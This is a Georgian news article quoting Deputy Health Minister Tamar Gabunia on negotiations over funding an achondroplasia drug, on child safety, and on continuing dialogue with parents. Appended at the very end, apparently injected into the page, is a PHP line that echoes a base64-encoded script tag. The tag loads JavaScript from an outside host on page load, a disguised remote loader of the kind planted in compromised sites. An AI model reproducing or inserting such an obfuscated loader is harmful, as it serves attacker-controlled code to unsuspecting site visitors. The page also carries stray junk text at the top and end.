celsiusi
ავერსი საქკაბელი

ჯანდაცვის მინისტრის პირველმა მოადგილემ, თამარ გაბუნიამ გადაცემა კვირის მოამბეში აქონდროპლაზიის სამკურნალო მედიკამენტის შესახებ ისაუბრა. გაბუნიას თქმით, მნიშვნელოვანია, მიმდინარე პროცესი დიალოგის ფორმატში გაგრძელდეს. მისივე თქმით, მშობლები პროცესებში ჩართულები იყვნენ და ყველა ეტაპი, რასაც სამინისტრო მწარმოებელთან მოლაპარაკებისას, ხარისხისა და ბავშვთა უსაფრთხოების გარანტიების მიღებისთვის გადიოდა, მათთვის ცნობილი იყო.

„ჩვენ ყველა ერთად მივდიოდით აქამდე. სხვა ქვეყნების მსგავსად, გავიარეთ კონსულტაციები, რა ფორმით აჯობებს ხელშეკრულების გაფორმება, რომ ჩვენ გვქონდეს გარანტირებული ხარისხი, გარანტირებული უსაფრთხოება ბავშვებისთვის და გრძელვადიან პერსპექტივაში ვიცოდეთ, რომ წამლის მოწოდება გაგრძელდება, ან ის რისკები რაც შეიძლება მედიკამენტს ჰქონდეს, ეს ჩვენთვისაც ცნობილი იყოს.

ბევრი წლის მანძილზე, ბევრი მედიკამენტი და ბევრი სერვისი დაფინანსდა ამ ქვეყანაში, მსგავსი ფონი ამ დაფინანსებას არ ქონია. ეს არ არის ის გზა, რაც ჩვენ ზოგადად მიგვიყვანს სწორ გადაწყვეტილებამდე, მედიკამენტის ან სერვისის დაფინანსებისთვის. უსაფრთხოება პაციენტის არის პირველი, არ ავნო ეს არის ფუნდამენტური პრინციპი მედიცინაში. ამიტომ პირველი, რაც სამინისტრომ გააკეთა მოიკვლია მონაცემები, რა ვიცით ამ მედიკამენტზე, გარდა იმისა, რომ ეს 52 კვირიანი კვლევა ჩატარდა და გარკვეული პოტენციალი ნამდვილად აქვს. ადვოკაციისთვის ევროპის იშვიათი დაავადებების საზოგადოებას მივმართე მე პირადად, რომ კიდევ მეტი, დამატებითი ინფორმაცია მოეწოდებინა, თუმცა ამას ჭირდება გარკვეული, მეტი დრო.
უმჯობესია, რაღაცნაირად შეთანხმების პროცესი წავიდეს დიალოგის ფორმატში.

ეს დაძაბულობა რთულია ძალიან ბავშვებისთვის, ბავშვები დიდი ფსიქოლოგიური ზეწოლის ქვეშ არიან ამ ყველაფრის გამო და ძალიან მნიშვნელოვანია მათი მოლოდინების და იმედის გათვალისწინება. ის რომ რაღაცნაირად უნდა მოვახერხოთ, რომ ერთიანად, კონსოლიდირებული რესურსით, გავაგრძელოთ ეს პროცესი უკვე კონსტრუქციული დიალოგის ფორმატში“, - განაცხადა თამარ გაბუნიამ. 

286
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");